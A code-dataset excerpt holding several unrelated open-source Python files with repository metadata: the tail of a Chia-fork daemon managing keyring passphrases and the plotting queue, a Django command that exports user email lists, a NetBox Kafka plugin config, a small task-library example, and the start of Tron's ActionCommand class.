if Keychain.has_master_passphrase() and not current_passphrase:
current_passphrase = request.get("current_passphrase", None)
if type(current_passphrase) is not str:
return {"success": False, "error": "missing current_passphrase"}
new_passphrase = request.get("new_passphrase", None)
if type(new_passphrase) is not str:
return {"success": False, "error": "missing new_passphrase"}
if not Keychain.passphrase_meets_requirements(new_passphrase):
return {"success": False, "error": "passphrase doesn't satisfy requirements"}
try:
assert new_passphrase is not None # mypy, I love you
Keychain.set_master_passphrase(
current_passphrase,
new_passphrase,
allow_migration=False,
passphrase_hint=passphrase_hint,
save_passphrase=save_passphrase,
)
except KeyringRequiresMigration:
error = "keyring requires migration"
except KeyringCurrentPassphraseIsInvalid:
error = "current passphrase is invalid"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Failed to set keyring passphrase: {e} {tb}")
else:
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def remove_keyring_passphrase(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
current_passphrase: Optional[str] = None
if not Keychain.has_master_passphrase():
return {"success": False, "error": "passphrase not set"}
current_passphrase = request.get("current_passphrase", None)
if type(current_passphrase) is not str:
return {"success": False, "error": "missing current_passphrase"}
try:
Keychain.remove_master_passphrase(current_passphrase)
except KeyringCurrentPassphraseIsInvalid:
error = "current passphrase is invalid"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Failed to remove keyring passphrase: {e} {tb}")
else:
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
response: Dict[str, Any] = {"success": success, "error": error}
return response
async def notify_keyring_migration_completed(self, request: Dict[str, Any]) -> Dict[str, Any]:
success: bool = False
error: Optional[str] = None
key: Optional[str] = request.get("key", None)
if type(key) is not str:
return {"success": False, "error": "missing key"}
Keychain.handle_migration_completed()
try:
if Keychain.master_passphrase_is_valid(key, force_reload=True):
Keychain.set_cached_master_passphrase(key)
success = True
# Inform the GUI of keyring status changes
self.keyring_status_changed(await self.keyring_status(), "wallet_ui")
else:
error = "bad passphrase"
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Keyring passphrase validation failed: {e} {tb}")
error = "validation exception"
response: Dict[str, Any] = {"success": success, "error": error}
return response
def get_status(self) -> Dict[str, Any]:
response = {"success": True, "genesis_initialized": True}
return response
async def _keyring_status_changed(self, keyring_status: Dict[str, Any], destination: str):
"""
Attempt to communicate with the GUI to inform it of any keyring status changes
(e.g. keyring becomes unlocked or migration completes)
"""
websockets = self.connections.get("wallet_ui", None)
if websockets is None:
return None
if keyring_status is None:
return None
response = create_payload("keyring_status_changed", keyring_status, "daemon", destination)
for websocket in websockets:
try:
await websocket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
websockets.remove(websocket)
await websocket.close()
def keyring_status_changed(self, keyring_status: Dict[str, Any], destination: str):
asyncio.create_task(self._keyring_status_changed(keyring_status, destination))
def plot_queue_to_payload(self, plot_queue_item, send_full_log: bool) -> Dict[str, Any]:
error = plot_queue_item.get("error")
has_error = error is not None
item = {
"id": plot_queue_item["id"],
"queue": plot_queue_item["queue"],
"size": plot_queue_item["size"],
"parallel": plot_queue_item["parallel"],
"delay": plot_queue_item["delay"],
"state": plot_queue_item["state"],
"error": str(error) if has_error else None,
"deleted": plot_queue_item["deleted"],
"log_new": plot_queue_item.get("log_new"),
}
if send_full_log:
item["log"] = plot_queue_item.get("log")
return item
def prepare_plot_state_message(self, state: PlotEvent, id):
message = {
"state": state,
"queue": self.extract_plot_queue(id),
}
return message
def extract_plot_queue(self, id=None) -> List[Dict]:
send_full_log = id is None
data = []
for item in self.plots_queue:
if id is None or item["id"] == id:
data.append(self.plot_queue_to_payload(item, send_full_log))
return data
async def _state_changed(self, service: str, message: Dict[str, Any]):
"""If id is None, send the whole state queue"""
if service not in self.connections:
return None
websockets = self.connections[service]
if message is None:
return None
response = create_payload("state_changed", message, service, "wallet_ui")
for websocket in websockets:
try:
await websocket.send(response)
except Exception as e:
tb = traceback.format_exc()
self.log.error(f"Unexpected exception trying to send to websocket: {e} {tb}")
websockets.remove(websocket)
await websocket.close()
def state_changed(self, service: str, message: Dict[str, Any]):
asyncio.create_task(self._state_changed(service, message))
async def _watch_file_changes(self, config, fp: TextIO, loop: asyncio.AbstractEventLoop):
id = config["id"]
final_words = ["Renamed final file"]
while True:
new_data = await loop.run_in_executor(io_pool_exc, fp.readline)
if config["state"] is not PlotState.RUNNING:
return None
if new_data not in (None, ""):
config["log"] = new_data if config["log"] is None else config["log"] + new_data
config["log_new"] = new_data
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.LOG_CHANGED, id))
if new_data:
for word in final_words:
if word in new_data:
return None
else:
time.sleep(0.5)
async def _track_plotting_progress(self, config, loop: asyncio.AbstractEventLoop):
file_path = config["out_file"]
with open(file_path, "r") as fp:
await self._watch_file_changes(config, fp, loop)
def _build_plotting_command_args(self, request: Any, ignoreCount: bool) -> List[str]:
service_name = request["service"]
k = request["k"]
n = 1 if ignoreCount else request["n"]
t = request["t"]
t2 = request["t2"]
d = request["d"]
b = request["b"]
u = request["u"]
r = request["r"]
f = request.get("f")
p = request.get("p")
c = request.get("c")
a = request.get("a")
e = request["e"]
x = request["x"]
override_k = request["overrideK"]
command_args: List[str] = []
command_args += service_name.split(" ")
command_args.append(f"-k{k}")
command_args.append(f"-n{n}")
command_args.append(f"-t{t}")
command_args.append(f"-2{t2}")
command_args.append(f"-d{d}")
command_args.append(f"-b{b}")
command_args.append(f"-u{u}")
command_args.append(f"-r{r}")
if a is not None:
command_args.append(f"-a{a}")
if f is not None:
command_args.append(f"-f{f}")
if p is not None:
command_args.append(f"-p{p}")
if c is not None:
command_args.append(f"-c{c}")
if e is True:
command_args.append("-e")
if x is True:
command_args.append("-x")
if override_k is True:
command_args.append("--override-k")
self.log.debug(f"command_args are {command_args}")
return command_args
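    # Illustrative example (hypothetical values): a request such as
    # {"service": "heather plots create", "k": 32, "n": 2, "t": "/plot/tmp", "t2": "/plot/tmp2",
    #  "d": "/plots", "b": 4000, "u": 128, "r": 4, "e": False, "x": False, "overrideK": False}
    # yields, with ignoreCount=True, command_args like
    # ['heather', 'plots', 'create', '-k32', '-n1', '-t/plot/tmp', '-2/plot/tmp2', '-d/plots',
    #  '-b4000', '-u128', '-r4'].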
def _is_serial_plotting_running(self, queue: str = "default") -> bool:
response = False
for item in self.plots_queue:
if item["queue"] == queue and item["parallel"] is False and item["state"] is PlotState.RUNNING:
response = True
return response
def _get_plots_queue_item(self, id: str):
config = next(item for item in self.plots_queue if item["id"] == id)
return config
def _run_next_serial_plotting(self, loop: asyncio.AbstractEventLoop, queue: str = "default"):
next_plot_id = None
if self._is_serial_plotting_running(queue) is True:
return None
for item in self.plots_queue:
if item["queue"] == queue and item["state"] is PlotState.SUBMITTED and item["parallel"] is False:
next_plot_id = item["id"]
if next_plot_id is not None:
loop.create_task(self._start_plotting(next_plot_id, loop, queue))
async def _start_plotting(self, id: str, loop: asyncio.AbstractEventLoop, queue: str = "default"):
current_process = None
try:
log.info(f"Starting plotting with ID {id}")
config = self._get_plots_queue_item(id)
if config is None:
raise Exception(f"Plot queue config with ID {id} does not exist")
state = config["state"]
if state is not PlotState.SUBMITTED:
raise Exception(f"Plot with ID {id} has no state submitted")
id = config["id"]
delay = config["delay"]
await asyncio.sleep(delay)
if config["state"] is not PlotState.SUBMITTED:
return None
service_name = config["service_name"]
command_args = config["command_args"]
# Set the -D/--connect_to_daemon flag to signify that the child should connect
# to the daemon to access the keychain
command_args.append("-D")
self.log.debug(f"command_args before launch_plotter are {command_args}")
self.log.debug(f"self.root_path before launch_plotter is {self.root_path}")
process, pid_path = launch_plotter(self.root_path, service_name, command_args, id)
current_process = process
config["state"] = PlotState.RUNNING
config["out_file"] = plotter_log_path(self.root_path, id).absolute()
config["process"] = process
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
if service_name not in self.services:
self.services[service_name] = []
self.services[service_name].append(process)
await self._track_plotting_progress(config, loop)
config["state"] = PlotState.FINISHED
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_name}") # lgtm [py/clear-text-logging-sensitive-data]
error = Exception("Start plotting failed")
config["state"] = PlotState.FINISHED
config["error"] = error
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
raise error
finally:
if current_process is not None:
self.services[service_name].remove(current_process)
current_process.wait() # prevent zombies
self._run_next_serial_plotting(loop, queue)
async def start_plotting(self, request: Dict[str, Any]):
service_name = request["service"]
delay = request.get("delay", 0)
parallel = request.get("parallel", False)
size = request.get("k")
count = request.get("n", 1)
queue = request.get("queue", "default")
if ("p" in request) and ("c" in request):
response = {
"success": False,
"service_name": service_name,
"error": "Choose one of pool_contract_address and pool_public_key",
}
return response
ids: List[str] = []
for k in range(count):
id = str(uuid.uuid4())
ids.append(id)
config = {
"id": id,
"size": size,
"queue": queue,
"service_name": service_name,
"command_args": self._build_plotting_command_args(request, True),
"parallel": parallel,
"delay": delay * k if parallel is True else delay,
"state": PlotState.SUBMITTED,
"deleted": False,
"error": None,
"log": None,
"process": None,
}
self.plots_queue.append(config)
# notify GUI about new plot queue item
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
# only the first item can start when user selected serial plotting
can_start_serial_plotting = k == 0 and self._is_serial_plotting_running(queue) is False
if parallel is True or can_start_serial_plotting:
log.info(f"Plotting will start in {config['delay']} seconds")
loop = asyncio.get_event_loop()
loop.create_task(self._start_plotting(id, loop, queue))
else:
log.info("Plotting will start automatically when previous plotting finish")
response = {
"success": True,
"ids": ids,
"service_name": service_name,
}
return response
async def stop_plotting(self, request: Dict[str, Any]) -> Dict[str, Any]:
id = request["id"]
config = self._get_plots_queue_item(id)
if config is None:
return {"success": False}
id = config["id"]
state = config["state"]
process = config["process"]
queue = config["queue"]
if config["state"] is PlotState.REMOVING:
return {"success": False}
try:
run_next = False
if process is not None and state == PlotState.RUNNING:
run_next = True
config["state"] = PlotState.REMOVING
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
await kill_process(process, self.root_path, service_plotter, id)
config["state"] = PlotState.FINISHED
config["deleted"] = True
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
self.plots_queue.remove(config)
if run_next:
loop = asyncio.get_event_loop()
self._run_next_serial_plotting(loop, queue)
return {"success": True}
except Exception as e:
log.error(f"Error during killing the plot process: {e}")
config["state"] = PlotState.FINISHED
config["error"] = str(e)
self.state_changed(service_plotter, self.prepare_plot_state_message(PlotEvent.STATE_CHANGED, id))
return {"success": False}
async def start_service(self, request: Dict[str, Any]):
service_command = request["service"]
error = None
success = False
testing = False
if "testing" in request:
testing = request["testing"]
if not validate_service(service_command):
error = "unknown service"
if service_command in self.services:
service = self.services[service_command]
r = service is not None and service.poll() is None
if r is False:
self.services.pop(service_command)
error = None
else:
error = f"Service {service_command} already running"
if error is None:
try:
exe_command = service_command
if testing is True:
exe_command = f"{service_command} --testing=true"
process, pid_path = launch_service(self.root_path, exe_command)
self.services[service_command] = process
success = True
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_command}")
error = "start failed"
response = {"success": success, "service": service_command, "error": error}
return response
async def stop_service(self, request: Dict[str, Any]) -> Dict[str, Any]:
service_name = request["service"]
result = await kill_service(self.root_path, self.services, service_name)
response = {"success": result, "service_name": service_name}
return response
async def is_running(self, request: Dict[str, Any]) -> Dict[str, Any]:
service_name = request["service"]
if service_name == service_plotter:
processes = self.services.get(service_name)
is_running = processes is not None and len(processes) > 0
response = {
"success": True,
"service_name": service_name,
"is_running": is_running,
}
else:
process = self.services.get(service_name)
is_running = process is not None and process.poll() is None
response = {
"success": True,
"service_name": service_name,
"is_running": is_running,
}
return response
async def exit(self) -> Dict[str, Any]:
jobs = []
for k in self.services.keys():
jobs.append(kill_service(self.root_path, self.services, k))
if jobs:
await asyncio.wait(jobs)
self.services.clear()
# TODO: fix this hack
asyncio.get_event_loop().call_later(5, lambda *args: sys.exit(0))
log.info("heather daemon exiting in 5 seconds")
response = {"success": True}
return response
async def register_service(self, websocket: WebSocketServerProtocol, request: Dict[str, Any]) -> Dict[str, Any]:
self.log.info(f"Register service {request}")
service = request["service"]
if service not in self.connections:
self.connections[service] = []
self.connections[service].append(websocket)
response: Dict[str, Any] = {"success": True}
if service == service_plotter:
response = {
"success": True,
"service": service,
"queue": self.extract_plot_queue(),
}
else:
self.remote_address_map[websocket] = service
if self.ping_job is None:
self.ping_job = asyncio.create_task(self.ping_task())
self.log.info(f"registered for service {service}")
log.info(f"{response}")
return response
def daemon_launch_lock_path(root_path: Path) -> Path:
"""
    A path to a file that is locked while a daemon is launching but not yet started.
This prevents multiple instances from launching.
"""
return root_path / "run" / "start-daemon.launching"
def service_launch_lock_path(root_path: Path, service: str) -> Path:
"""
    A path to a file that is locked while a service is running.
"""
service_name = service.replace(" ", "-").replace("/", "-")
return root_path / "run" / f"{service_name}.lock"
def pid_path_for_service(root_path: Path, service: str, id: str = "") -> Path:
"""
Generate a path for a PID file for the given service name.
"""
pid_name = service.replace(" ", "-").replace("/", "-")
return root_path / "run" / f"{pid_name}{id}.pid"
def plotter_log_path(root_path: Path, id: str):
return root_path / "plotter" / f"plotter_log_{id}.txt"
def launch_plotter(root_path: Path, service_name: str, service_array: List[str], id: str):
# we need to pass on the possibly altered HEATHER_ROOT
os.environ["HEATHER_ROOT"] = str(root_path)
service_executable = executable_for_service(service_array[0])
# Swap service name with name of executable
service_array[0] = service_executable
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # type: ignore
# Windows-specific.
# If the current process group is used, CTRL_C_EVENT will kill the parent and everyone in the group!
try:
creationflags: int = subprocess.CREATE_NEW_PROCESS_GROUP # type: ignore
except AttributeError: # Not on Windows.
creationflags = 0
plotter_path = plotter_log_path(root_path, id)
if plotter_path.parent.exists():
if plotter_path.exists():
plotter_path.unlink()
else:
mkdir(plotter_path.parent)
outfile = open(plotter_path.resolve(), "w")
log.info(f"Service array: {service_array}") # lgtm [py/clear-text-logging-sensitive-data]
process = subprocess.Popen(
service_array,
shell=False,
stderr=outfile,
stdout=outfile,
startupinfo=startupinfo,
creationflags=creationflags,
)
pid_path = pid_path_for_service(root_path, service_name, id)
try:
mkdir(pid_path.parent)
with open(pid_path, "w") as f:
f.write(f"{process.pid}\n")
except Exception:
pass
return process, pid_path
def launch_service(root_path: Path, service_command) -> Tuple[subprocess.Popen, Path]:
"""
Launch a child process.
"""
# set up HEATHER_ROOT
# invoke correct script
# save away PID
# we need to pass on the possibly altered HEATHER_ROOT
os.environ["HEATHER_ROOT"] = str(root_path)
log.debug(f"Launching service with HEATHER_ROOT: {os.environ['HEATHER_ROOT']}")
    # Insert proper executable
service_array = service_command.split()
service_executable = executable_for_service(service_array[0])
service_array[0] = service_executable
if service_command == "heather_full_node_simulator":
# Set the -D/--connect_to_daemon flag to signify that the child should connect
# to the daemon to access the keychain
service_array.append("-D")
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW # type: ignore
# CREATE_NEW_PROCESS_GROUP allows graceful shutdown on windows, by CTRL_BREAK_EVENT signal
if sys.platform == "win32" or sys.platform == "cygwin":
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
else:
creationflags = 0
environ_copy = os.environ.copy()
process = subprocess.Popen(
service_array, shell=False, startupinfo=startupinfo, creationflags=creationflags, env=environ_copy
)
pid_path = pid_path_for_service(root_path, service_command)
try:
mkdir(pid_path.parent)
with open(pid_path, "w") as f:
f.write(f"{process.pid}\n")
except Exception:
pass
return process, pid_path
async def kill_process(
process: subprocess.Popen, root_path: Path, service_name: str, id: str, delay_before_kill: int = 15
) -> bool:
pid_path = pid_path_for_service(root_path, service_name, id)
if sys.platform == "win32" or sys.platform == "cygwin":
log.info("sending CTRL_BREAK_EVENT signal to %s", service_name)
# pylint: disable=E1101
kill(process.pid, signal.SIGBREAK) # type: ignore
else:
log.info("sending term signal to %s", service_name)
process.terminate()
count: float = 0
while count < delay_before_kill:
if process.poll() is not None:
break
await asyncio.sleep(0.5)
count += 0.5
else:
process.kill()
log.info("sending kill signal to %s", service_name)
r = process.wait()
log.info("process %s returned %d", service_name, r)
try:
pid_path_killed = pid_path.with_suffix(".pid-killed")
if pid_path_killed.exists():
pid_path_killed.unlink()
os.rename(pid_path, pid_path_killed)
except Exception:
pass
return True
async def kill_service(
root_path: Path, services: Dict[str, subprocess.Popen], service_name: str, delay_before_kill: int = 15
) -> bool:
process = services.get(service_name)
if process is None:
return False
del services[service_name]
result = await kill_process(process, root_path, service_name, "", delay_before_kill)
return result
def is_running(services: Dict[str, subprocess.Popen], service_name: str) -> bool:
process = services.get(service_name)
return process is not None and process.poll() is None
def create_server_for_daemon(root_path: Path):
routes = web.RouteTableDef()
services: Dict = dict()
@routes.get("/daemon/ping/")
async def ping(request: web.Request) -> web.Response:
return web.Response(text="pong")
@routes.get("/daemon/service/start/")
async def start_service(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None or not validate_service(service_name):
r = f"{service_name} unknown service"
return web.Response(text=str(r))
if is_running(services, service_name):
r = f"{service_name} already running"
return web.Response(text=str(r))
try:
process, pid_path = launch_service(root_path, service_name)
services[service_name] = process
r = f"{service_name} started"
except (subprocess.SubprocessError, IOError):
log.exception(f"problem starting {service_name}")
r = f"{service_name} start failed"
return web.Response(text=str(r))
@routes.get("/daemon/service/stop/")
async def stop_service(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None:
r = f"{service_name} unknown service"
return web.Response(text=str(r))
r = str(await kill_service(root_path, services, service_name))
return web.Response(text=str(r))
@routes.get("/daemon/service/is_running/")
async def is_running_handler(request: web.Request) -> web.Response:
service_name = request.query.get("service")
if service_name is None:
r = f"{service_name} unknown service"
return web.Response(text=str(r))
r = str(is_running(services, service_name))
return web.Response(text=str(r))
@routes.get("/daemon/exit/")
async def exit(request: web.Request):
jobs = []
for k in services.keys():
jobs.append(kill_service(root_path, services, k))
if jobs:
await asyncio.wait(jobs)
services.clear()
# we can't await `site.stop()` here because that will cause a deadlock, waiting for this
# request to exit
def singleton(lockfile: Path, text: str = "semaphore") -> Optional[TextIO]:
"""
Open a lockfile exclusively.
"""
if not lockfile.parent.exists():
mkdir(lockfile.parent)
try:
if has_fcntl:
f = open(lockfile, "w")
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
else:
if lockfile.exists():
lockfile.unlink()
fd = os.open(lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
f = open(fd, "w")
f.write(text)
except IOError:
return None
return f
async def async_run_daemon(root_path: Path, wait_for_unlock: bool = False) -> int:
# When wait_for_unlock is true, we want to skip the check_keys() call in chia_init
# since it might be necessary to wait for the GUI to unlock the keyring first.
chia_init(root_path, should_check_keys=(not wait_for_unlock))
config = load_config(root_path, "config.yaml")
setproctitle("heather_daemon")
initialize_logging("daemon", config["logging"], root_path)
lockfile = singleton(daemon_launch_lock_path(root_path))
crt_path = root_path / config["daemon_ssl"]["private_crt"]
key_path = root_path / config["daemon_ssl"]["private_key"]
ca_crt_path = root_path / config["private_ssl_ca"]["crt"]
ca_key_path = root_path / config["private_ssl_ca"]["key"]
sys.stdout.flush()
json_msg = dict_to_json_str(
{
"message": "cert_path",
"success": True,
"cert": f"{crt_path}",
"key": f"{key_path}",
"ca_crt": f"{ca_crt_path}",
}
)
sys.stdout.write("\n" + json_msg + "\n")
sys.stdout.flush()
if lockfile is None:
print("daemon: already launching")
return 2
# TODO: clean this up, ensuring lockfile isn't removed until the listen port is open
create_server_for_daemon(root_path)
ws_server = WebSocketServer(
root_path, ca_crt_path, ca_key_path, crt_path, key_path, run_check_keys_on_unlock=wait_for_unlock
)
await ws_server.start()
assert ws_server.websocket_server is not None
await ws_server.websocket_server.wait_closed()
log.info("Daemon WebSocketServer closed")
# sys.stdout.close()
return 0
def run_daemon(root_path: Path, wait_for_unlock: bool = False) -> int:
result = asyncio.get_event_loop().run_until_complete(async_run_daemon(root_path, wait_for_unlock))
return result
def main(argv) -> int:
from chia.util.default_root import DEFAULT_ROOT_PATH
from chia.util.keychain import Keychain
wait_for_unlock = "--wait-for-unlock" in argv and Keychain.is_keyring_locked()
return run_daemon(DEFAULT_ROOT_PATH, wait_for_unlock)
if __name__ == "__main__":
main(sys.argv[1:])
| 38.604027
| 116
| 0.61737
|
6628ba9c7748d71e3e7e774e43e3394ba75210ad
| 5,056
|
py
|
Python
|
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | null | null | null |
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | 10
|
2020-06-05T21:41:01.000Z
|
2022-02-10T07:33:38.000Z
|
django_extensions/management/commands/export_emails.py
|
kaozdl/django-extensions
|
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from django.core.management.base import BaseCommand, CommandError
from django_extensions.compat import csv_writer as writer
from django_extensions.management.utils import signalcommand
FORMATS = [
'address',
'emails',
'google',
'outlook',
'linkedin',
'vcard',
]
def full_name(first_name, last_name, username, **extra):
"""Return full name or username."""
name = " ".join(n for n in [first_name, last_name] if n)
if not name:
return username
return name
class Command(BaseCommand):
help = "Export user email address list in one of a number of formats."
args = "[output file]"
label = 'filename to save to'
can_import_settings = True
encoding = 'utf-8' # RED_FLAG: add as an option -DougN
def __init__(self, *args, **kwargs):
super(Command, self).__init__(*args, **kwargs)
self.UserModel = get_user_model()
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--group', '-g', action='store', dest='group', default=None,
help='Limit to users which are part of the supplied group name',
        )
parser.add_argument(
'--format', '-f', action='store', dest='format', default=FORMATS[0],
help="output format. May be one of %s." % ", ".join(FORMATS),
)
@signalcommand
def handle(self, *args, **options):
if len(args) > 1:
raise CommandError("extra arguments supplied")
group = options['group']
if group and not Group.objects.filter(name=group).count() == 1:
names = "', '".join(g['name'] for g in Group.objects.values('name'))
if names:
names = "'" + names + "'."
raise CommandError("Unknown group '" + group + "'. Valid group names are: " + names)
UserModel = get_user_model()
qs = UserModel.objects.all().order_by('last_name', 'first_name', 'username', 'email')
if group:
qs = qs.filter(groups__name=group).distinct()
qs = qs.values('last_name', 'first_name', 'username', 'email')
getattr(self, options['format'])(qs)
def address(self, qs):
"""
Single entry per line in the format of:
"full name" <my@address.com>;
"""
self.stdout.write("\n".join('"%s" <%s>;' % (full_name(**ent), ent['email']) for ent in qs))
self.stdout.write("\n")
def emails(self, qs):
"""
Single entry with email only in the format of:
my@address.com,
"""
self.stdout.write(",\n".join(ent['email'] for ent in qs))
self.stdout.write("\n")
def google(self, qs):
"""CSV format suitable for importing into google GMail"""
csvf = writer(sys.stdout)
csvf.writerow(['Name', 'Email'])
for ent in qs:
csvf.writerow([full_name(**ent), ent['email']])
def linkedin(self, qs):
"""
CSV format suitable for importing into linkedin Groups.
perfect for pre-approving members of a linkedin group.
"""
csvf = writer(sys.stdout)
csvf.writerow(['First Name', 'Last Name', 'Email'])
for ent in qs:
csvf.writerow([ent['first_name'], ent['last_name'], ent['email']])
def outlook(self, qs):
"""CSV format suitable for importing into outlook"""
csvf = writer(sys.stdout)
columns = ['Name', 'E-mail Address', 'Notes', 'E-mail 2 Address', 'E-mail 3 Address',
'Mobile Phone', 'Pager', 'Company', 'Job Title', 'Home Phone', 'Home Phone 2',
'Home Fax', 'Home Address', 'Business Phone', 'Business Phone 2',
'Business Fax', 'Business Address', 'Other Phone', 'Other Fax', 'Other Address']
csvf.writerow(columns)
empty = [''] * (len(columns) - 2)
for ent in qs:
csvf.writerow([full_name(**ent), ent['email']] + empty)
def vcard(self, qs):
"""VCARD format."""
try:
import vobject
except ImportError:
print(self.style.ERROR("Please install vobject to use the vcard export format."))
sys.exit(1)
out = sys.stdout
for ent in qs:
card = vobject.vCard()
card.add('fn').value = full_name(**ent)
if not ent['last_name'] and not ent['first_name']:
# fallback to fullname, if both first and lastname are not declared
card.add('n').value = vobject.vcard.Name(full_name(**ent))
else:
card.add('n').value = vobject.vcard.Name(ent['last_name'], ent['first_name'])
emailpart = card.add('email')
emailpart.value = ent['email']
emailpart.type_param = 'INTERNET'
out.write(card.serialize())
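# Hedged usage sketch (illustrative, not part of this file): the command is run
# through manage.py; the group name "staff" below is an assumption.
#
#   python manage.py export_emails --format=google > contacts.csv
#   python manage.py export_emails -g staff -f vcard > staff.vcf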
| 36.374101
| 99
| 0.578323
|
4368500c075e428a90fbf0c95852e42793d16e21
| 1,085
|
py
|
Python
|
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
netbox_kafka_producer/__init__.py
|
posiczko/netbox-kafka-producer
|
cc328f2398bea6d2f4a0011feed413bc4f136381
|
[
"MIT"
] | null | null | null |
from extras.plugins import PluginConfig
class NetboxKafkaProducerConfig(PluginConfig):
"""
    This class defines attributes for the NetBox Kafka producer plugin.
"""
# Plugin package name
name = 'netbox_kafka_producer'
# Human-friendly name and description
verbose_name = 'Netbox Kafka producer'
description = 'Easily publish NetBox changes to Kafka'
# Plugin version
version = '1.0.27'
# Plugin author
    author = 'Eric Busto'
    author_email = 'ebusto@nvidia.com'
# Configuration parameters that MUST be defined by the user (if any)
required_settings = []
# Default configuration parameter values, if not set by the user
default_settings = {
}
# Base URL path. If not set, the plugin name will be used.
# Caching config
caching_config = {}
middleware = ("netbox_kafka_producer.middleware.KafkaChangeMiddleware",)
default_settings = {
'kafka': {
'servers': 'kafka1:9092,kafka2:9092',
'topic': 'netbox',
},
}
config = NetboxKafkaProducerConfig
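# Hedged example (illustrative): the plugin's defaults above can be overridden
# from NetBox's configuration.py via PLUGINS_CONFIG; the broker addresses here
# are made up.
#
#   PLUGINS_CONFIG = {
#       "netbox_kafka_producer": {
#           "kafka": {
#               "servers": "broker1:9092,broker2:9092",
#               "topic": "netbox",
#           },
#       },
#   }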
| 24.111111
| 76
| 0.662673
|
6855be0ddd5c277079d16dba6cba076f95456d20
| 338
|
py
|
Python
|
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | 2
|
2017-08-26T12:21:14.000Z
|
2017-08-28T10:55:04.000Z
|
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/examples/advanced/simple.py
|
Laufire/ec
|
63e84a1daef9234487d7de538e5da233a7d13071
|
[
"BSD-3-Clause"
] | null | null | null |
"""Helper import for demonstrating advanced examples.
"""
from ec.ec import task, arg, group
@task
@arg('arg1', type=int, desc='Value for arg1 (int)')
@arg('arg2', type=int)
def task1(arg1, arg2=1):
print arg1, arg2
@group(desc='Description for group1.')
class group1:
@task
@arg('arg1')
def task1(arg1):
print arg1 + arg1
| 18.777778
| 53
| 0.671598
|
99264019e9da52e801f053a8405677cfc268306b
| 6,692
|
py
|
Python
|
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
tron/actioncommand.py
|
dnephin/Tron
|
bd0f763421c6de50551e9a4b0e4a1c0c8ceb450a
|
[
"Apache-2.0"
] | null | null | null |
import logging
import os
from tron.config import schema
from tron.serialize import filehandler
from tron.utils import state, timeutils
log = logging.getLogger(__name__)
class ActionState(state.NamedEventState):
pass
class CompletedActionCommand(object):
"""This is a null object for ActionCommand."""
is_complete = True
is_done = True
is_failed = False
@staticmethod
def write_stderr(_):
pass
class ActionCommand(object):
"""An ActionCommand encapsulates a runnable task that is passed to a node
for execution.
A Node calls:
started (when the command starts)
exited (when the command exits)
write_<channel> (when output is received)
done (when the command is finished)
"""
COMPLETE = ActionState('complete')
FAILSTART = ActionState('failstart')
EXITING = ActionState('exiting', close=COMPLETE)
RUNNING = ActionState('running', exit=EXITING)
PENDING = ActionState('pending', start=RUNNING, exit=FAILSTART)
STDOUT = '.stdout'
STDERR = '.stderr'
def __init__(self, id, command, serializer=None):
self.id = id
self.command = command
self.machine = state.StateMachine(self.PENDING, delegate=self)
self.exit_status = None
self.start_time = None
self.end_time = None
self.stdout = filehandler.NullFileHandle
self.stderr = filehandler.NullFileHandle
if serializer:
self.stdout = serializer.open(self.STDOUT)
self.stderr = serializer.open(self.STDERR)
@property
def state(self):
return self.machine.state
@property
def attach(self):
return self.machine.attach
def started(self):
if not self.machine.check('start'):
